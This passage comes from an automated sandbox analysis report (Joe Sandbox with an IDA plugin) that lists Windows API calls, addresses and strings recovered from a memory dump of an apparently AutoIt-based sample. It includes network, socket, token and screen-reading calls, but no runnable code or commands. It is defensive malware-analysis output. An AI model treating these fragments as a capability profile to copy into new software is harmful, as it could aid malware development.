                                                                                                                                                                                • Part of subcall function 00504A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00504A60
                                                                                                                                                                                • Part of subcall function 00504A41: InternetCloseHandle.WININET(00000000), ref: 00504AFD
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1463438336-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 005188A3
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005188BD
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005188CB
                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005188D9
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2169480361-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0050906D
                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 0050907F
                                                                                                                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 0050908C
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 005090A3
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastacceptselect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 385091864-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004F2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?), ref: 004F2CB9
                                                                                                                                                                                • Part of subcall function 004F2CAA: lstrcpyW.KERNEL32(00000000,?,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F2CDF
                                                                                                                                                                                • Part of subcall function 004F2CAA: lstrcmpiW.KERNEL32(00000000,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?), ref: 004F2D10
                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F1916
                                                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F193C
                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F1970
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                              • String ID: cdecl
                                                                                                                                                                              • API String ID: 4031866154-3896280584
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 004E3D65
                                                                                                                                                                                • Part of subcall function 004D45EC: __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                                                                                                                                                • Part of subcall function 004D45EC: __NMSG_WRITE.LIBCMT ref: 004D460A
                                                                                                                                                                                • Part of subcall function 004D45EC: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,?,?,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D462F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 614378929-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004F715C
                                                                                                                                                                              • _memset.LIBCMT ref: 004F717D
                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004F71CF
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004F71D8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1157408455-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004F13EE
                                                                                                                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004F1409
                                                                                                                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004F141F
                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 004F1474
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3137044355-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004EC285
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC297
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC2AD
                                                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC2C8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004F7C6C
                                                                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 004F7C9F
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004F7CB5
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004F7CBC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2880819207-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004CC66B
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3970641297-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F49EE
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A13
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A1D
                                                                                                                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A50
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2875609808-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D869D: __getptd_noexit.LIBCMT ref: 004D869E
                                                                                                                                                                              • __lock.LIBCMT ref: 004D811F
                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004D813C
                                                                                                                                                                              • _free.LIBCMT ref: 004D814F
                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00F12490), ref: 004D8167
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2704283638-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 004F9C7F
                                                                                                                                                                                • Part of subcall function 004FAD14: _memset.LIBCMT ref: 004FAD49
                                                                                                                                                                              • _memmove.LIBCMT ref: 004F9CA2
                                                                                                                                                                              • _memset.LIBCMT ref: 004F9CAF
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 004F9CBF
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 48991266-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                                                                                                                                                • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                                                                                                                                                • Part of subcall function 004CB58B: BeginPath.GDI32(?), ref: 004CB611
                                                                                                                                                                                • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                                                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0051E860
                                                                                                                                                                              • LineTo.GDI32(00000000,?,?), ref: 0051E86D
                                                                                                                                                                              • EndPath.GDI32(00000000), ref: 0051E87D
                                                                                                                                                                              • StrokePath.GDI32(00000000), ref: 0051E88B
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1539411459-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004ED640
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 004ED653
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004ED65A
                                                                                                                                                                              • AttachThreadInput.USER32(00000000), ref: 004ED661
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 004EBE01
                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,004EB9C9), ref: 004EBE08
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004EB9C9), ref: 004EBE15
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,004EB9C9), ref: 004EBE1C
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColor.USER32(00000008), ref: 004CB0C5
                                                                                                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 004CB0CF
                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004CB0E4
                                                                                                                                                                              • GetStockObject.GDI32(00000005), ref: 004CB0EC
                                                                                                                                                                              • GetWindowDC.USER32(?,00000000), ref: 0052ECFA
                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0052ED07
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0052ED20
                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0052ED39
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0052ED59
                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0052ED64
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                              APIs
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004EC071
                                                                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 004EC07D
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004EC086
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004EC08E
                                                                                                                                                                                • Part of subcall function 004EB850: GetProcessHeap.KERNEL32(00000000,?,004EB574), ref: 004EB857
                                                                                                                                                                                • Part of subcall function 004EB850: HeapFree.KERNEL32(00000000), ref: 004EB85E
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                              APIs
                                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 004D4C3E
                                                                                                                                                                                • Part of subcall function 004D86B5: GetLastError.KERNEL32(?,004D0127,004D88A3,004D4673,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D86B7
                                                                                                                                                                                • Part of subcall function 004D86B5: __calloc_crt.LIBCMT ref: 004D86D8
                                                                                                                                                                                • Part of subcall function 004D86B5: GetCurrentThreadId.KERNEL32 ref: 004D8701
                                                                                                                                                                                • Part of subcall function 004D86B5: SetLastError.KERNEL32(00000000,004D0127,004D88A3,004D4673,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D8719
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004D4C1D), ref: 004D4C52
                                                                                                                                                                              • __freeptd.LIBCMT ref: 004D4C59
                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004D4C61
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 408300095-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID: >$DEFINE
                                                                                                                                                                              • API String ID: 4104443479-1664449232
                                                                                                                                                                              APIs
                                                                                                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 004EECA0
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ContainedObject
                                                                                                                                                                              • String ID: AutoIt3GUI$Container
                                                                                                                                                                              • API String ID: 3565006973-3941886329
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 004FE785
                                                                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 004FE84E
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                              • String ID: LPT
                                                                                                                                                                              • API String ID: 3222508074-1350329615
                                                                                                                                                                              APIs
                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 004B1B83
                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 004B1B9C
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B417D: __fread_nolock.LIBCMT ref: 004B419B
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FCF49
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004FCF5C
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                              • String ID: FILE
                                                                                                                                                                              • API String ID: 4029003684-3121273764
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • __getbuf.LIBCMT ref: 004D9B8A
                                                                                                                                                                              • __lseeki64.LIBCMT ref: 004D9BFA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                                                              • String ID: pMN
                                                                                                                                                                              • API String ID: 3311320906-2130963613
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0051A668
                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0051A67D
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: '
                                                                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0051961B
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00519657
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$DestroyMove
                                                                                                                                                                              • String ID: static
                                                                                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5BE4
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004F5C1F
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                                                                              APIs
                                                                                                                                                                              • __snwprintf.LIBCMT ref: 00506BDD
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __snwprintf_memmove
                                                                                                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                              • API String ID: 3506404897-2584243854
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00519269
                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00519274
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: Combobox
                                                                                                                                                                              • API String ID: 3850602802-2096851135
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                                                                                                                                                • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                                                                                                                                                • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00519775
                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 0051978F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                              • String ID: static
                                                                                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 005194A6
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005194B5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                                                                                                              • String ID: edit
                                                                                                                                                                              • API String ID: 2978978980-2167791130
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 004F5CF3
                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004F5D12
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
